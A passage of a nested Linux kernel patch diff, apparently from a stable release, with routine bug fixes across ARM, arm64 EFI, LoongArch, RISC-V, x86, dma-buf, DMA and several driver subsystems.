+ 		{
+@@ -373,12 +358,6 @@ static struct omap_mcbsp_platform_data omap16xx_mcbsp_pdata[] = {
+ };
+ #define OMAP16XX_MCBSP_RES_SZ		ARRAY_SIZE(omap16xx_mcbsp_res[1])
+ #define OMAP16XX_MCBSP_COUNT		ARRAY_SIZE(omap16xx_mcbsp_res)
+-#else
+-#define omap16xx_mcbsp_res_0		NULL
+-#define omap16xx_mcbsp_pdata		NULL
+-#define OMAP16XX_MCBSP_RES_SZ		0
+-#define OMAP16XX_MCBSP_COUNT		0
+-#endif
+ 
+ static void omap_mcbsp_register_board_cfg(struct resource *res, int res_count,
+ 			struct omap_mcbsp_platform_data *config, int size)
+diff --git a/arch/arm/mach-omap1/pm.h b/arch/arm/mach-omap1/pm.h
+index d9165709c5323..0d1f092821ff8 100644
+--- a/arch/arm/mach-omap1/pm.h
++++ b/arch/arm/mach-omap1/pm.h
+@@ -106,13 +106,6 @@
+ #define OMAP7XX_IDLECT3		0xfffece24
+ #define OMAP7XX_IDLE_LOOP_REQUEST	0x0C00
+ 
+-#if     !defined(CONFIG_ARCH_OMAP730) && \
+-	!defined(CONFIG_ARCH_OMAP850) && \
+-	!defined(CONFIG_ARCH_OMAP15XX) && \
+-	!defined(CONFIG_ARCH_OMAP16XX)
+-#warning "Power management for this processor not implemented yet"
+-#endif
+-
+ #ifndef __ASSEMBLER__
+ 
+ #include <linux/clk.h>
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp.dtsi b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+index bb916a0948a8f..d944ecca1b3c2 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+@@ -1279,7 +1279,7 @@
+ 			reg = <0x32f10100 0x8>,
+ 			      <0x381f0000 0x20>;
+ 			clocks = <&clk IMX8MP_CLK_HSIO_ROOT>,
+-				 <&clk IMX8MP_CLK_USB_ROOT>;
++				 <&clk IMX8MP_CLK_USB_SUSP>;
+ 			clock-names = "hsio", "suspend";
+ 			interrupts = <GIC_SPI 148 IRQ_TYPE_LEVEL_HIGH>;
+ 			power-domains = <&hsio_blk_ctrl IMX8MP_HSIOBLK_PD_USB>;
+@@ -1292,9 +1292,9 @@
+ 			usb_dwc3_0: usb@38100000 {
+ 				compatible = "snps,dwc3";
+ 				reg = <0x38100000 0x10000>;
+-				clocks = <&clk IMX8MP_CLK_HSIO_AXI>,
++				clocks = <&clk IMX8MP_CLK_USB_ROOT>,
+ 					 <&clk IMX8MP_CLK_USB_CORE_REF>,
+-					 <&clk IMX8MP_CLK_USB_ROOT>;
++					 <&clk IMX8MP_CLK_USB_SUSP>;
+ 				clock-names = "bus_early", "ref", "suspend";
+ 				interrupts = <GIC_SPI 40 IRQ_TYPE_LEVEL_HIGH>;
+ 				phys = <&usb3_phy0>, <&usb3_phy0>;
+@@ -1321,7 +1321,7 @@
+ 			reg = <0x32f10108 0x8>,
+ 			      <0x382f0000 0x20>;
+ 			clocks = <&clk IMX8MP_CLK_HSIO_ROOT>,
+-				 <&clk IMX8MP_CLK_USB_ROOT>;
++				 <&clk IMX8MP_CLK_USB_SUSP>;
+ 			clock-names = "hsio", "suspend";
+ 			interrupts = <GIC_SPI 149 IRQ_TYPE_LEVEL_HIGH>;
+ 			power-domains = <&hsio_blk_ctrl IMX8MP_HSIOBLK_PD_USB>;
+@@ -1334,9 +1334,9 @@
+ 			usb_dwc3_1: usb@38200000 {
+ 				compatible = "snps,dwc3";
+ 				reg = <0x38200000 0x10000>;
+-				clocks = <&clk IMX8MP_CLK_HSIO_AXI>,
++				clocks = <&clk IMX8MP_CLK_USB_ROOT>,
+ 					 <&clk IMX8MP_CLK_USB_CORE_REF>,
+-					 <&clk IMX8MP_CLK_USB_ROOT>;
++					 <&clk IMX8MP_CLK_USB_SUSP>;
+ 				clock-names = "bus_early", "ref", "suspend";
+ 				interrupts = <GIC_SPI 41 IRQ_TYPE_LEVEL_HIGH>;
+ 				phys = <&usb3_phy1>, <&usb3_phy1>;
+diff --git a/arch/arm64/include/asm/efi.h b/arch/arm64/include/asm/efi.h
+index 439e2bc5d5d8b..b9f3165075c9d 100644
+--- a/arch/arm64/include/asm/efi.h
++++ b/arch/arm64/include/asm/efi.h
+@@ -25,6 +25,7 @@ int efi_set_mapping_permissions(struct mm_struct *mm, efi_memory_desc_t *md);
+ ({									\
+ 	efi_virtmap_load();						\
+ 	__efi_fpsimd_begin();						\
++	spin_lock(&efi_rt_lock);					\
+ })
+ 
+ #undef arch_efi_call_virt
+@@ -33,10 +34,12 @@ int efi_set_mapping_permissions(struct mm_struct *mm, efi_memory_desc_t *md);
+ 
+ #define arch_efi_call_virt_teardown()					\
+ ({									\
++	spin_unlock(&efi_rt_lock);					\
+ 	__efi_fpsimd_end();						\
+ 	efi_virtmap_unload();						\
+ })
+ 
++extern spinlock_t efi_rt_lock;
+ efi_status_t __efi_rt_asm_wrapper(void *, const char *, ...);
+ 
+ #define ARCH_EFI_IRQ_FLAGS_MASK (PSR_D_BIT | PSR_A_BIT | PSR_I_BIT | PSR_F_BIT)
+diff --git a/arch/arm64/kernel/efi-rt-wrapper.S b/arch/arm64/kernel/efi-rt-wrapper.S
+index 75691a2641c1c..2d3c4b02393e4 100644
+--- a/arch/arm64/kernel/efi-rt-wrapper.S
++++ b/arch/arm64/kernel/efi-rt-wrapper.S
+@@ -4,6 +4,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <asm/assembler.h>
+ 
+ SYM_FUNC_START(__efi_rt_asm_wrapper)
+ 	stp	x29, x30, [sp, #-32]!
+@@ -16,6 +17,12 @@ SYM_FUNC_START(__efi_rt_asm_wrapper)
+ 	 */
+ 	stp	x1, x18, [sp, #16]
+ 
++	ldr_l	x16, efi_rt_stack_top
++	mov	sp, x16
++#ifdef CONFIG_SHADOW_CALL_STACK
++	str	x18, [sp, #-16]!
++#endif
++
+ 	/*
+ 	 * We are lucky enough that no EFI runtime services take more than
+ 	 * 5 arguments, so all are passed in registers rather than via the
+@@ -29,6 +36,7 @@ SYM_FUNC_START(__efi_rt_asm_wrapper)
+ 	mov	x4, x6
+ 	blr	x8
+ 
++	mov	sp, x29
+ 	ldp	x1, x2, [sp, #16]
+ 	cmp	x2, x18
+ 	ldp	x29, x30, [sp], #32
+@@ -42,6 +50,10 @@ SYM_FUNC_START(__efi_rt_asm_wrapper)
+ 	 * called with preemption disabled and a separate shadow stack is used
+ 	 * for interrupts.
+ 	 */
+-	mov	x18, x2
++#ifdef CONFIG_SHADOW_CALL_STACK
++	ldr_l	x18, efi_rt_stack_top
++	ldr	x18, [x18, #-16]
++#endif
++
+ 	b	efi_handle_corrupted_x18	// tail call
+ SYM_FUNC_END(__efi_rt_asm_wrapper)
+diff --git a/arch/arm64/kernel/efi.c b/arch/arm64/kernel/efi.c
+index a908a37f03678..386bd81ca12bb 100644
+--- a/arch/arm64/kernel/efi.c
++++ b/arch/arm64/kernel/efi.c
+@@ -144,3 +144,30 @@ asmlinkage efi_status_t efi_handle_corrupted_x18(efi_status_t s, const char *f)
+ 	pr_err_ratelimited(FW_BUG "register x18 corrupted by EFI %s\n", f);
+ 	return s;
+ }
++
++DEFINE_SPINLOCK(efi_rt_lock);
++
++asmlinkage u64 *efi_rt_stack_top __ro_after_init;
++
++/* EFI requires 8 KiB of stack space for runtime services */
++static_assert(THREAD_SIZE >= SZ_8K);
++
++static int __init arm64_efi_rt_init(void)
++{
++	void *p;
++
++	if (!efi_enabled(EFI_RUNTIME_SERVICES))
++		return 0;
++
++	p = __vmalloc_node(THREAD_SIZE, THREAD_ALIGN, GFP_KERNEL,
++			   NUMA_NO_NODE, &&l);
++l:	if (!p) {
++		pr_warn("Failed to allocate EFI runtime stack\n");
++		clear_bit(EFI_RUNTIME_SERVICES, &efi.flags);
++		return -ENOMEM;
++	}
++
++	efi_rt_stack_top = p + THREAD_SIZE;
++	return 0;
++}
++core_initcall(arm64_efi_rt_init);
+diff --git a/arch/loongarch/kernel/cpu-probe.c b/arch/loongarch/kernel/cpu-probe.c
+index 255a09876ef28..3a3fce2d78461 100644
+--- a/arch/loongarch/kernel/cpu-probe.c
++++ b/arch/loongarch/kernel/cpu-probe.c
+@@ -94,7 +94,7 @@ static void cpu_probe_common(struct cpuinfo_loongarch *c)
+ 	c->options = LOONGARCH_CPU_CPUCFG | LOONGARCH_CPU_CSR |
+ 		     LOONGARCH_CPU_TLB | LOONGARCH_CPU_VINT | LOONGARCH_CPU_WATCH;
+ 
+-	elf_hwcap |= HWCAP_LOONGARCH_CRC32;
++	elf_hwcap = HWCAP_LOONGARCH_CPUCFG | HWCAP_LOONGARCH_CRC32;
+ 
+ 	config = read_cpucfg(LOONGARCH_CPUCFG1);
+ 	if (config & CPUCFG1_UAL) {
+diff --git a/arch/riscv/boot/dts/sifive/fu740-c000.dtsi b/arch/riscv/boot/dts/sifive/fu740-c000.dtsi
+index 43bed6c0a84fe..5235fd1c9cb67 100644
+--- a/arch/riscv/boot/dts/sifive/fu740-c000.dtsi
++++ b/arch/riscv/boot/dts/sifive/fu740-c000.dtsi
+@@ -328,7 +328,7 @@
+ 			bus-range = <0x0 0xff>;
+ 			ranges = <0x81000000  0x0 0x60080000  0x0 0x60080000 0x0 0x10000>,      /* I/O */
+ 				 <0x82000000  0x0 0x60090000  0x0 0x60090000 0x0 0xff70000>,    /* mem */
+-				 <0x82000000  0x0 0x70000000  0x0 0x70000000 0x0 0x1000000>,    /* mem */
++				 <0x82000000  0x0 0x70000000  0x0 0x70000000 0x0 0x10000000>,    /* mem */
+ 				 <0xc3000000 0x20 0x00000000 0x20 0x00000000 0x20 0x00000000>;  /* mem prefetchable */
+ 			num-lanes = <0x8>;
+ 			interrupts = <56>, <57>, <58>, <59>, <60>, <61>, <62>, <63>, <64>;
+diff --git a/arch/x86/events/rapl.c b/arch/x86/events/rapl.c
+index a829492bca4c1..52e6e7ed4f78a 100644
+--- a/arch/x86/events/rapl.c
++++ b/arch/x86/events/rapl.c
+@@ -800,13 +800,18 @@ static const struct x86_cpu_id rapl_model_match[] __initconst = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(ICELAKE_X,		&model_hsx),
+ 	X86_MATCH_INTEL_FAM6_MODEL(COMETLAKE_L,		&model_skl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(COMETLAKE,		&model_skl),
++	X86_MATCH_INTEL_FAM6_MODEL(TIGERLAKE_L,		&model_skl),
++	X86_MATCH_INTEL_FAM6_MODEL(TIGERLAKE,		&model_skl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE,		&model_skl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_L,		&model_skl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_N,		&model_skl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(SAPPHIRERAPIDS_X,	&model_spr),
++	X86_MATCH_INTEL_FAM6_MODEL(EMERALDRAPIDS_X,	&model_spr),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE,		&model_skl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_P,	&model_skl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_S,	&model_skl),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE,		&model_skl),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE_L,	&model_skl),
+ 	{},
+ };
+ MODULE_DEVICE_TABLE(x86cpu, rapl_model_match);
+diff --git a/arch/x86/kernel/fpu/init.c b/arch/x86/kernel/fpu/init.c
+index 8946f89761cc3..851eb13edc014 100644
+--- a/arch/x86/kernel/fpu/init.c
++++ b/arch/x86/kernel/fpu/init.c
+@@ -133,9 +133,6 @@ static void __init fpu__init_system_generic(void)
+ 	fpu__init_system_mxcsr();
+ }
+ 
+-/* Get alignment of the TYPE. */
+-#define TYPE_ALIGN(TYPE) offsetof(struct { char x; TYPE test; }, test)
+-
+ /*
+  * Enforce that 'MEMBER' is the last field of 'TYPE'.
+  *
+@@ -143,8 +140,8 @@ static void __init fpu__init_system_generic(void)
+  * because that's how C aligns structs.
+  */
+ #define CHECK_MEMBER_AT_END_OF(TYPE, MEMBER) \
+-	BUILD_BUG_ON(sizeof(TYPE) != ALIGN(offsetofend(TYPE, MEMBER), \
+-					   TYPE_ALIGN(TYPE)))
++	BUILD_BUG_ON(sizeof(TYPE) !=         \
++		     ALIGN(offsetofend(TYPE, MEMBER), _Alignof(TYPE)))
+ 
+ /*
+  * We append the 'struct fpu' to the task_struct:
+diff --git a/arch/x86/lib/iomap_copy_64.S b/arch/x86/lib/iomap_copy_64.S
+index a1f9416bf67a5..6ff2f56cb0f71 100644
+--- a/arch/x86/lib/iomap_copy_64.S
++++ b/arch/x86/lib/iomap_copy_64.S
+@@ -10,6 +10,6 @@
+  */
+ SYM_FUNC_START(__iowrite32_copy)
+ 	movl %edx,%ecx
+-	rep movsd
++	rep movsl
+ 	RET
+ SYM_FUNC_END(__iowrite32_copy)
+diff --git a/block/mq-deadline.c b/block/mq-deadline.c
+index 6672f1bce3795..f10c2a0d18d41 100644
+--- a/block/mq-deadline.c
++++ b/block/mq-deadline.c
+@@ -294,7 +294,7 @@ static inline int deadline_check_fifo(struct dd_per_prio *per_prio,
+ /*
+  * Check if rq has a sequential request preceding it.
+  */
+-static bool deadline_is_seq_writes(struct deadline_data *dd, struct request *rq)
++static bool deadline_is_seq_write(struct deadline_data *dd, struct request *rq)
+ {
+ 	struct request *prev = deadline_earlier_request(rq);
+ 
+@@ -353,7 +353,7 @@ deadline_fifo_request(struct deadline_data *dd, struct dd_per_prio *per_prio,
+ 	list_for_each_entry(rq, &per_prio->fifo_list[DD_WRITE], queuelist) {
+ 		if (blk_req_can_dispatch_to_zone(rq) &&
+ 		    (blk_queue_nonrot(rq->q) ||
+-		     !deadline_is_seq_writes(dd, rq)))
++		     !deadline_is_seq_write(dd, rq)))
+ 			goto out;
+ 	}
+ 	rq = NULL;
+diff --git a/drivers/accessibility/speakup/spk_ttyio.c b/drivers/accessibility/speakup/spk_ttyio.c
+index 08cf8a17754bb..07373b3debd1e 100644
+--- a/drivers/accessibility/speakup/spk_ttyio.c
++++ b/drivers/accessibility/speakup/spk_ttyio.c
+@@ -354,6 +354,9 @@ void spk_ttyio_release(struct spk_synth *in_synth)
+ {
+ 	struct tty_struct *tty = in_synth->dev;
+ 
++	if (tty == NULL)
++		return;
++
+ 	tty_lock(tty);
+ 
+ 	if (tty->ops->close)
+diff --git a/drivers/acpi/prmt.c b/drivers/acpi/prmt.c
+index 998101cf16e47..3d4c4620f9f95 100644
+--- a/drivers/acpi/prmt.c
++++ b/drivers/acpi/prmt.c
+@@ -236,6 +236,11 @@ static acpi_status acpi_platformrt_space_handler(u32 function,
+ 	efi_status_t status;
+ 	struct prm_context_buffer context;
+ 
++	if (!efi_enabled(EFI_RUNTIME_SERVICES)) {
++		pr_err_ratelimited("PRM: EFI runtime services no longer available\n");
++		return AE_NO_HANDLER;
++	}
++
+ 	/*
+ 	 * The returned acpi_status will always be AE_OK. Error values will be
+ 	 * saved in the first byte of the PRM message buffer to be used by ASL.
+@@ -325,6 +330,11 @@ void __init init_prmt(void)
+ 
+ 	pr_info("PRM: found %u modules\n", mc);
+ 
++	if (!efi_enabled(EFI_RUNTIME_SERVICES)) {
++		pr_err("PRM: EFI runtime services unavailable\n");
++		return;
++	}
++
+ 	status = acpi_install_address_space_handler(ACPI_ROOT_OBJECT,
+ 						    ACPI_ADR_SPACE_PLATFORM_RT,
+ 						    &acpi_platformrt_space_handler,
+diff --git a/drivers/block/pktcdvd.c b/drivers/block/pktcdvd.c
+index 4cea3b08087ed..2f1a92509271c 100644
+--- a/drivers/block/pktcdvd.c
++++ b/drivers/block/pktcdvd.c
+@@ -2400,6 +2400,8 @@ static void pkt_submit_bio(struct bio *bio)
+ 	struct bio *split;
+ 
+ 	bio = bio_split_to_limits(bio);
++	if (!bio)
++		return;
+ 
+ 	pkt_dbg(2, pd, "start = %6llx stop = %6llx\n",
+ 		(unsigned long long)bio->bi_iter.bi_sector,
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index bae9b2a408d95..e4398590b0edc 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -2157,10 +2157,17 @@ static void qca_serdev_shutdown(struct device *dev)
+ 	int timeout = msecs_to_jiffies(CMD_TRANS_TIMEOUT_MS);
+ 	struct serdev_device *serdev = to_serdev_device(dev);
+ 	struct qca_serdev *qcadev = serdev_device_get_drvdata(serdev);
++	struct hci_uart *hu = &qcadev->serdev_hu;
++	struct hci_dev *hdev = hu->hdev;
++	struct qca_data *qca = hu->priv;
+ 	const u8 ibs_wake_cmd[] = { 0xFD };
+ 	const u8 edl_reset_soc_cmd[] = { 0x01, 0x00, 0xFC, 0x01, 0x05 };
+ 
+ 	if (qcadev->btsoc_type == QCA_QCA6390) {
++		if (test_bit(QCA_BT_OFF, &qca->flags) ||
++		    !test_bit(HCI_RUNNING, &hdev->flags))
++			return;
++
+ 		serdev_device_write_flush(serdev);
+ 		ret = serdev_device_write_buf(serdev, ibs_wake_cmd,
+ 					      sizeof(ibs_wake_cmd));
+diff --git a/drivers/comedi/drivers/adv_pci1760.c b/drivers/comedi/drivers/adv_pci1760.c
+index fcfc2e299110e..27f3890f471df 100644
+--- a/drivers/comedi/drivers/adv_pci1760.c
++++ b/drivers/comedi/drivers/adv_pci1760.c
+@@ -58,7 +58,7 @@
+ #define PCI1760_CMD_CLR_IMB2		0x00	/* Clears IMB2 */
+ #define PCI1760_CMD_SET_DO		0x01	/* Set output state */
+ #define PCI1760_CMD_GET_DO		0x02	/* Read output status */
+-#define PCI1760_CMD_GET_STATUS		0x03	/* Read current status */
++#define PCI1760_CMD_GET_STATUS		0x07	/* Read current status */
+ #define PCI1760_CMD_GET_FW_VER		0x0e	/* Read firmware version */
+ #define PCI1760_CMD_GET_HW_VER		0x0f	/* Read hardware version */
+ #define PCI1760_CMD_SET_PWM_HI(x)	(0x10 + (x) * 2) /* Set "hi" period */
+diff --git a/drivers/dma-buf/dma-buf-sysfs-stats.c b/drivers/dma-buf/dma-buf-sysfs-stats.c
+index 2bba0babcb62b..4b680e10c15a3 100644
+--- a/drivers/dma-buf/dma-buf-sysfs-stats.c
++++ b/drivers/dma-buf/dma-buf-sysfs-stats.c
+@@ -168,14 +168,11 @@ void dma_buf_uninit_sysfs_statistics(void)
+ 	kset_unregister(dma_buf_stats_kset);
+ }
+ 
+-int dma_buf_stats_setup(struct dma_buf *dmabuf)
++int dma_buf_stats_setup(struct dma_buf *dmabuf, struct file *file)
+ {
+ 	struct dma_buf_sysfs_entry *sysfs_entry;
+ 	int ret;
+ 
+-	if (!dmabuf || !dmabuf->file)
+-		return -EINVAL;
+-
+ 	if (!dmabuf->exp_name) {
+ 		pr_err("exporter name must not be empty if stats needed\n");
+ 		return -EINVAL;
+@@ -192,7 +189,7 @@ int dma_buf_stats_setup(struct dma_buf *dmabuf)
+ 
+ 	/* create the directory for buffer stats */
+ 	ret = kobject_init_and_add(&sysfs_entry->kobj, &dma_buf_ktype, NULL,
+-				   "%lu", file_inode(dmabuf->file)->i_ino);
++				   "%lu", file_inode(file)->i_ino);
+ 	if (ret)
+ 		goto err_sysfs_dmabuf;
+ 
+diff --git a/drivers/dma-buf/dma-buf-sysfs-stats.h b/drivers/dma-buf/dma-buf-sysfs-stats.h
+index a49c6e2650ccc..7a8a995b75bae 100644
+--- a/drivers/dma-buf/dma-buf-sysfs-stats.h
++++ b/drivers/dma-buf/dma-buf-sysfs-stats.h
+@@ -13,7 +13,7 @@
+ int dma_buf_init_sysfs_statistics(void);
+ void dma_buf_uninit_sysfs_statistics(void);
+ 
+-int dma_buf_stats_setup(struct dma_buf *dmabuf);
++int dma_buf_stats_setup(struct dma_buf *dmabuf, struct file *file);
+ 
+ void dma_buf_stats_teardown(struct dma_buf *dmabuf);
+ #else
+@@ -25,7 +25,7 @@ static inline int dma_buf_init_sysfs_statistics(void)
+ 
+ static inline void dma_buf_uninit_sysfs_statistics(void) {}
+ 
+-static inline int dma_buf_stats_setup(struct dma_buf *dmabuf)
++static inline int dma_buf_stats_setup(struct dma_buf *dmabuf, struct file *file)
+ {
+ 	return 0;
+ }
+diff --git a/drivers/dma-buf/dma-buf.c b/drivers/dma-buf/dma-buf.c
+index e6f36c014c4cd..eb6b59363c4f5 100644
+--- a/drivers/dma-buf/dma-buf.c
++++ b/drivers/dma-buf/dma-buf.c
+@@ -95,10 +95,11 @@ static int dma_buf_file_release(struct inode *inode, struct file *file)
+ 		return -EINVAL;
+ 
+ 	dmabuf = file->private_data;
+-
+-	mutex_lock(&db_list.lock);
+-	list_del(&dmabuf->list_node);
+-	mutex_unlock(&db_list.lock);
++	if (dmabuf) {
++		mutex_lock(&db_list.lock);
++		list_del(&dmabuf->list_node);
++		mutex_unlock(&db_list.lock);
++	}
+ 
+ 	return 0;
+ }
+@@ -523,17 +524,17 @@ static inline int is_dma_buf_file(struct file *file)
+ 	return file->f_op == &dma_buf_fops;
+ }
+ 
+-static struct file *dma_buf_getfile(struct dma_buf *dmabuf, int flags)
++static struct file *dma_buf_getfile(size_t size, int flags)
+ {
+ 	static atomic64_t dmabuf_inode = ATOMIC64_INIT(0);
+-	struct file *file;
+ 	struct inode *inode = alloc_anon_inode(dma_buf_mnt->mnt_sb);
++	struct file *file;
+ 
+ 	if (IS_ERR(inode))
+ 		return ERR_CAST(inode);
+ 
+-	inode->i_size = dmabuf->size;
+-	inode_set_bytes(inode, dmabuf->size);
++	inode->i_size = size;
++	inode_set_bytes(inode, size);
+ 
+ 	/*
+ 	 * The ->i_ino acquired from get_next_ino() is not unique thus
+@@ -547,8 +548,6 @@ static struct file *dma_buf_getfile(struct dma_buf *dmabuf, int flags)
+ 				 flags, &dma_buf_fops);
+ 	if (IS_ERR(file))
+ 		goto err_alloc_file;
+-	file->private_data = dmabuf;
+-	file->f_path.dentry->d_fsdata = dmabuf;
+ 
+ 	return file;
+ 
+@@ -614,19 +613,11 @@ struct dma_buf *dma_buf_export(const struct dma_buf_export_info *exp_info)
+ 	size_t alloc_size = sizeof(struct dma_buf);
+ 	int ret;
+ 
+-	if (!exp_info->resv)
+-		alloc_size += sizeof(struct dma_resv);
+-	else
+-		/* prevent &dma_buf[1] == dma_buf->resv */
+-		alloc_size += 1;
+-
+-	if (WARN_ON(!exp_info->priv
+-			  || !exp_info->ops
+-			  || !exp_info->ops->map_dma_buf
+-			  || !exp_info->ops->unmap_dma_buf
+-			  || !exp_info->ops->release)) {
++	if (WARN_ON(!exp_info->priv || !exp_info->ops
++		    || !exp_info->ops->map_dma_buf
++		    || !exp_info->ops->unmap_dma_buf
++		    || !exp_info->ops->release))
+ 		return ERR_PTR(-EINVAL);
+-	}
+ 
+ 	if (WARN_ON(exp_info->ops->cache_sgt_mapping &&
+ 		    (exp_info->ops->pin || exp_info->ops->unpin)))
+@@ -638,10 +629,21 @@ struct dma_buf *dma_buf_export(const struct dma_buf_export_info *exp_info)
+ 	if (!try_module_get(exp_info->owner))
+ 		return ERR_PTR(-ENOENT);
+ 
++	file = dma_buf_getfile(exp_info->size, exp_info->flags);
++	if (IS_ERR(file)) {
++		ret = PTR_ERR(file);
++		goto err_module;
++	}
++
++	if (!exp_info->resv)
++		alloc_size += sizeof(struct dma_resv);
++	else
++		/* prevent &dma_buf[1] == dma_buf->resv */
++		alloc_size += 1;
+ 	dmabuf = kzalloc(alloc_size, GFP_KERNEL);
+ 	if (!dmabuf) {
+ 		ret = -ENOMEM;
+-		goto err_module;
++		goto err_file;
+ 	}
+ 
+ 	dmabuf->priv = exp_info->priv;
+@@ -653,44 +655,36 @@ struct dma_buf *dma_buf_export(const struct dma_buf_export_info *exp_info)
+ 	init_waitqueue_head(&dmabuf->poll);
+ 	dmabuf->cb_in.poll = dmabuf->cb_out.poll = &dmabuf->poll;
+ 	dmabuf->cb_in.active = dmabuf->cb_out.active = 0;
++	mutex_init(&dmabuf->lock);
++	INIT_LIST_HEAD(&dmabuf->attachments);
+ 
+ 	if (!resv) {
+-		resv = (struct dma_resv *)&dmabuf[1];
+-		dma_resv_init(resv);
++		dmabuf->resv = (struct dma_resv *)&dmabuf[1];
++		dma_resv_init(dmabuf->resv);
++	} else {
++		dmabuf->resv = resv;
+ 	}
+-	dmabuf->resv = resv;
+ 
+-	file = dma_buf_getfile(dmabuf, exp_info->flags);
+-	if (IS_ERR(file)) {
+-		ret = PTR_ERR(file);
++	ret = dma_buf_stats_setup(dmabuf, file);
++	if (ret)
+ 		goto err_dmabuf;
+-	}
+ 
++	file->private_data = dmabuf;
++	file->f_path.dentry->d_fsdata = dmabuf;
+ 	dmabuf->file = file;
+ 
+-	mutex_init(&dmabuf->lock);
+-	INIT_LIST_HEAD(&dmabuf->attachments);
+-
+ 	mutex_lock(&db_list.lock);
+ 	list_add(&dmabuf->list_node, &db_list.head);
+ 	mutex_unlock(&db_list.lock);
+ 
+-	ret = dma_buf_stats_setup(dmabuf);
+-	if (ret)
+-		goto err_sysfs;
+-
+ 	return dmabuf;
+ 
+-err_sysfs:
+-	/*
+-	 * Set file->f_path.dentry->d_fsdata to NULL so that when
+-	 * dma_buf_release() gets invoked by dentry_ops, it exits
+-	 * early before calling the release() dma_buf op.
+-	 */
+-	file->f_path.dentry->d_fsdata = NULL;
+-	fput(file);
+ err_dmabuf:
++	if (!resv)
++		dma_resv_fini(dmabuf->resv);
+ 	kfree(dmabuf);
++err_file:
++	fput(file);
+ err_module:
+ 	module_put(exp_info->owner);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+index a183d93bd7e29..bf85aa0979ecb 100644
+--- a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
++++ b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+@@ -1018,6 +1018,11 @@ static noinline void axi_chan_handle_err(struct axi_dma_chan *chan, u32 status)
+ 
+ 	/* The bad descriptor currently is in the head of vc list */
+ 	vd = vchan_next_desc(&chan->vc);
++	if (!vd) {
++		dev_err(chan2dev(chan), "BUG: %s, IRQ with no descriptors\n",
++			axi_chan_name(chan));
++		goto out;
++	}
+ 	/* Remove the completed descriptor from issued list */
+ 	list_del(&vd->node);
+ 
+@@ -1032,6 +1037,7 @@ static noinline void axi_chan_handle_err(struct axi_dma_chan *chan, u32 status)
+ 	/* Try to restart the controller */
+ 	axi_chan_start_first_queued(chan);
+ 
++out:
+ 	spin_unlock_irqrestore(&chan->vc.lock, flags);
+ }
+ 
+diff --git a/drivers/dma/idxd/device.c b/drivers/dma/idxd/device.c
+index 6f44fa8f78a5d..6d8ff664fdfb2 100644
+--- a/drivers/dma/idxd/device.c
++++ b/drivers/dma/idxd/device.c
+@@ -1173,8 +1173,19 @@ static void idxd_flush_pending_descs(struct idxd_irq_entry *ie)
+ 	spin_unlock(&ie->list_lock);
+ 
+ 	list_for_each_entry_safe(desc, itr, &flist, list) {
++		struct dma_async_tx_descriptor *tx;
++
+ 		list_del(&desc->list);
+ 		ctype = desc->completion->status ? IDXD_COMPLETE_NORMAL : IDXD_COMPLETE_ABORT;
++		/*
++		 * wq is being disabled. Any remaining descriptors are
++		 * likely to be stuck and can be dropped. callback could
++		 * point to code that is no longer accessible, for example
++		 * if dmatest module has been unloaded.
++		 */
++		tx = &desc->txd;
++		tx->callback = NULL;
++		tx->callback_result = NULL;
+ 		idxd_dma_complete_txd(desc, ctype, true);
+ 	}
+ }
+@@ -1391,8 +1402,7 @@ err_res_alloc:
+ err_irq:
+ 	idxd_wq_unmap_portal(wq);
+ err_map_portal:
+-	rc = idxd_wq_disable(wq, false);
+-	if (rc < 0)
++	if (idxd_wq_disable(wq, false))
+ 		dev_dbg(dev, "wq %s disable failed\n", dev_name(wq_confdev(wq)));
+ err:
+ 	return rc;
+@@ -1409,11 +1419,11 @@ void drv_disable_wq(struct idxd_wq *wq)
+ 		dev_warn(dev, "Clients has claim on wq %d: %d\n",
+ 			 wq->id, idxd_wq_refcount(wq));
+ 
+-	idxd_wq_free_resources(wq);
+ 	idxd_wq_unmap_portal(wq);
+ 	idxd_wq_drain(wq);
+ 	idxd_wq_free_irq(wq);
+ 	idxd_wq_reset(wq);
++	idxd_wq_free_resources(wq);
+ 	percpu_ref_exit(&wq->wq_active);
+ 	wq->type = IDXD_WQT_NONE;
+ 	wq->client_count = 0;
+diff --git a/drivers/dma/lgm/lgm-dma.c b/drivers/dma/lgm/lgm-dma.c
+index 9b9184f964be3..1709d159af7e0 100644
+--- a/drivers/dma/lgm/lgm-dma.c
++++ b/drivers/dma/lgm/lgm-dma.c
+@@ -914,7 +914,7 @@ static void ldma_dev_init(struct ldma_dev *d)
+ 	}
+ }
+ 
+-static int ldma_cfg_init(struct ldma_dev *d)
++static int ldma_parse_dt(struct ldma_dev *d)
+ {
+ 	struct fwnode_handle *fwnode = dev_fwnode(d->dev);
+ 	struct ldma_port *p;
+@@ -1661,10 +1661,6 @@ static int intel_ldma_probe(struct platform_device *pdev)
+ 		p->ldev = d;
+ 	}
+ 
+-	ret = ldma_cfg_init(d);
+-	if (ret)
+-		return ret;
+-
+ 	dma_dev->dev = &pdev->dev;
+ 
+ 	ch_mask = (unsigned long)d->channels_mask;
+@@ -1675,6 +1671,10 @@ static int intel_ldma_probe(struct platform_device *pdev)
+ 			ldma_dma_init_v3X(j, d);
+ 	}
+ 
